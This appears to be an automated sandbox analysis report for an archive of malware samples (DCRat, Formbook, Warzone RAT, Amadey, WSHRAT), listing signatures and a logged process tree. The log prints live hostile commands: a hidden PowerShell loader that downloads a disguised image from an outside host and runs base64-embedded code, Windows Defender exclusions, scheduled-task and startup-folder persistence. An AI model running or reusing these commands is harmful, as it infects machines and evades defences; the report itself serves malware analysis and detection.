Malware Analysis Report

2024-10-19 09:24

Sample ID 230817-ydgersed3v
Target 2023-08-17-18.zip
SHA256 e33f116c4d031b092c1aa75e0cb68b5db4e362739a6b41c27475c3a0ddb32b3a
Tags
rat macro macro_on_action dcrat amadey formbook warzonerat wshrat sy22 infostealer spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e33f116c4d031b092c1aa75e0cb68b5db4e362739a6b41c27475c3a0ddb32b3a

Threat Level: Known bad

The file 2023-08-17-18.zip was found to be: Known bad.

Malicious Activity Summary

rat macro macro_on_action dcrat amadey formbook warzonerat wshrat sy22 infostealer spyware stealer trojan

Dcrat family

Formbook

WarzoneRat, AveMaria

Amadey family

DcRat

WSHRAT

DCRat payload

DCRat payload

Formbook payload

Warzone RAT payload

Office macro that triggers on suspicious action

Suspicious Office macro

Looks up external IP address via web service

Unsigned PE

Program crash

NSIS installer

Office document contains embedded OLE objects

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Gathers network information

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-17 19:40

Signatures

Amadey family

amadey

DCRat payload

rat

Dcrat family

dcrat

Office macro that triggers on suspicious action

macro macro_on_action

Suspicious Office macro

macro

Unsigned PE

NSIS installer

installer

Office document contains embedded OLE objects


Analysis: behavioral1

Detonation Overview

Submitted

2023-08-17 19:39

Reported

2023-08-17 19:50

Platform

win10v2004-20230703-en

Max time kernel

68s

Max time network

577s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-08-17-18.zip

Signatures

DcRat

rat infostealer dcrat

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

WarzoneRat, AveMaria

rat infostealer warzonerat

DCRat payload

rat

Formbook payload

rat

Warzone RAT payload

rat

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A checkip.dyndns.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A checkip.dyndns.org N/A N/A
N/A ip-api.com N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Office document contains embedded OLE objects


Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-08-17-18.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2023-08-17-18\" -spe -an -ai#7zMap7070:84:7zEvent9404

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1.xls"

C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe

"C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "

C:\comRuntimeCrtdll\agentbrowser.exe

"C:\comRuntimeCrtdll\agentbrowser.exe"

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\2023-08-17-18\4e8d2ed372068535d420927ad0f59dd34eda4f33f7bafcec6b694379b8948487.jar"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\7a57c3bcbdfc2482505bcf4c20885c1288635f780667a5cf4c7f0804251dd719.js"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"

C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe

"C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe"

C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"

C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe

"C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"

C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe

"C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"

C:\Users\Admin\AppData\Local\Tempwinlogon.exe

"C:\Users\Admin\AppData\Local\Tempwinlogon.exe"

C:\ProgramData\images.exe

"C:\ProgramData\images.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe"

C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"

C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe

"C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"

C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe

"C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"

C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe

"C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe"

C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe

"C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe

"C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4088 -ip 4088

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2023-08-17-18\940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71.rtf" /o ""

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1324

C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe

"C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"

C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe

"C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe"

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b.xlsx"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe

"C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe"

C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe

"C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"

C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe

"C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe"

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 5

C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe

"C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"

C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe

"C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"

C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe

"C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"

C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe

"C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"

C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"

C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"

C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe

"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RbsgeknsO.bat" "

C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe

"C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uiVprBevwjFGG" /XML "C:\Users\Admin\AppData\Local\Temp\tmp50E0.tmp"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c mkdir "\\?\C:\Windows "

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe

"C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\szBUFHBkBccpfd.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\szBUFHBkBccpfd" /XML "C:\Users\Admin\AppData\Local\Temp\tmp91D1.tmp"

C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe

"C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig /release

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /release

C:\comRuntimeCrtdll\agentbrowser.exe

"C:\comRuntimeCrtdll\agentbrowser.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "

C:\comRuntimeCrtdll\agentbrowser.exe

"C:\comRuntimeCrtdll\agentbrowser.exe"

C:\Windows\system32\cmd.exe

cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')

C:\comRuntimeCrtdll\agentbrowser.exe

"C:\comRuntimeCrtdll\agentbrowser.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.senym/842.15.67.08//:ptth');$method.Invoke($null, $arguments)"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig /renew

C:\Users\Admin\AppData\Local\Tempwinlogon.exe

"C:\Users\Admin\AppData\Local\Tempwinlogon.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe"

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /renew

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff6d0e46f8,0x7fff6d0e4708,0x7fff6d0e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 444 -p 388 -ip 388

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 388 -s 3664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2548 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 440 -p 4608 -ip 4608

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4608 -s 3644

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\69902a92d8b14946b5ce20cbff6aa3aa /t 3204 /p 436

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 628 -p 3740 -ip 3740

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3740 -s 3440

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 404 -p 3204 -ip 3204

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 600 -p 4412 -ip 4412

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4412 -s 3676

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

